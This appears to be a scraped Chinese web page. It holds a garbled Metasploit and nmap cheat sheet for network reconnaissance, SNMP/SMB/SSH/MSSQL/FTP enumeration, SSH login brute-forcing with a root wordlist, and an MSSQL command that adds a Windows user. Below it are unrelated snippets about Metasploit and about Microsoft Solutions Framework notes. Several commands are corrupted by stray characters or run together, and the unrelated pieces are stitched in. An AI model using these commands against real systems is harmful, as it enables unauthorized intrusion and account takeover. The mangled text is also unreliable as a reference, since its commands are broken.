db_nmap -sv 192.168.1.1192.168.1.1-24 192.168.1.1/24
files:/root/ip.txt
arp掃瞄
msf > use auxiliary/scanner/discovery/arp_sweep
set inte***ce ̵ rhosts̵ shost̵ smac̵ threadsҕ run
use auxiliary/scanner/portscan/syn
set inte***ce̵ ports̵ rhosts̵ threadsҕ run
use auxiliary/scanner/ip/ipidseq
set rhosts 192.168
.1.0/24 ҕ run
nmap -pn
-si《掃瞄位址》
use auxiliary/scanner/discovery/udp_sweep
use auxiliary/scanner/discovery/udp_probe
use auxiliary/sniffer/psnuffleuse auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/snmp/snmp_enumusers (windows)
use auxiliary/scanner/snmp/snmp_enumshares (windows)
use auxiliary/scanner/smb/smb_versionuse auxiliary/scanner/smb/pipe_auditoruse auxiliary/scanner/smb/pipe_dcerpc_auditoruse auxiliary/scanner/smb/smb_enumsharesuse auxiliary/scanner/smb/smb_enumusersuse auxiliary/scanner/smb/smb_lookupsiduse auxiliary/scanner/ssh/ssh_versionuse auxiliary/scanner/ssh/ssh_login
set userpass_file /usr/share/metasploit-framework/data/wordlists/
root_userpass.txt ; set verbose false ; run
use auxiliary/scanner/ssh/ssh_login_pubkey
set key_file id_rsa;set username root ;run
use post/windows/gather/enum_patches
show advanced
set verbose yes
tcp1433(動態埠)/udp1434(查詢tcp埠號)
use auxiliary/scanner/mssql/mssql_ping
use auxiliary/scanner/mssql/mssql_loginauxiliary/admin/mssql/mssql_exec
set cmd net user
user pass /add
use auxiliary/scanner/ftp/ftp_version
use auxiliary/scanner/ftp/anonymous
use auxiliary/scanner/ftp/ftp_login
MSF學習筆記
貴有恆何必三更眠五更起,最無益只怕一日曝十日寒 話不多說,上乾貨。滲透模組 exploit 執行時會利用目標主機漏洞進行攻擊。攻擊載荷模組 payload 在成功對目標完成一次滲透之後,這段程式開始在目標主機上執行,幫助我們獲取需要的訪問和行動許可權。輔助模組 auxiliary 包含一系列輔助支援...
微軟MSF框架學習筆記 1
解決方案框架簡介 it 的首要目標不是更多的技術而是將其主要力量 豐富的技術知識 同人和過程結合起來,為整個組織服務。msf 二個模型三個準則 技巧 先完成軟體的規格說明書,然後再進行開發 整個軟體開發過程 計畫 構造 部署 運營 計畫。計畫 構造和部署組成msf框架的範疇 運營屬於mof框架的範疇...
微軟MSF框架學習筆記 3
msf團隊角色 程式管理角色 專案管理 解決方案體系結構 過程管理 管理服務 目標 按照專案約束交付解決方案 發起人 維護人 策劃者 管理者 開發技術諮詢 體系結構和方案設計 應用程式開發 基礎架構開發 目標 根據規格說明書構建解決方案 從無到有 更改問題bug 測試測試計畫 測試實施 測試報告 目...